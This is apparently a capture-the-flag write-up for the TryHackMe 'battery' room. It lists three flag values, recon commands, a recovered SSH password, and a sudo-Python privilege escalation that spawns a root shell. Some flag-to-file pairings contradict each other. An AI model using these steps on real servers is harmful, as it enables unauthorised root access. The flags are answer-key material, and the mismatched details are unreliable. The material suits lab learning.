Skip to content

Latest commit

 

History

History
63 lines (53 loc) · 1.58 KB

writeup.md

File metadata and controls

63 lines (53 loc) · 1.58 KB
CTF designed by CTF lover for CTF lovers

Task 1. battery

Electricity bill portal has been hacked many times in the past , so we have fired one of the employee from the security team , As a new recruit you need to work like a hacker to find the loop holes in the portal and gain root access to the server .

Hope you will enjoy the journey !

Base Flag :

THM{6f7e4dd134e19af144c88e4fe46c67ea}

User Flag :

THM{20c1d18791a246001f5df7867d4e6bf5}

Root Flag :

THM{db12b4451d5e70e2a177880ecfe3428d}

Writeup

  • nmap -sSCV <IP>
  • gobuster dir -u http://<IP> -w /usr/share/dirb/wordlists /common.txt -x txt,php
  • <IP>/register.php
  • <IP>/report
  • strings report
  • echo "base64EncodedString" | base64 -d >> output.php
  • cyber:super#secure&password!
  • ssh cyber@<IP>
  • cat flag1.txt
THM{6f7e4dd134e19af144c88e4fe46c67ea}
  • sudo -l
  • echo 'import os; os.system("/bin/sh")' > /home/cyber/run.py
  • chmod +x run.py
  • cyber@ubuntu:~$ sudo /usr/bin/python3 /home/cyber/run.py
  • cat /root/root.txt
THM{20c1d18791a246001f5df7867d4e6bf5}
  • cd /home
  • ls
  • cyber yash
  • cd cyber
  • ls
  • cyber yash
  • emergency.py fernet flag2.txt root.txt
  • cat flag2.txt
THM{db12b4451d5e70e2a177880ecfe3428d}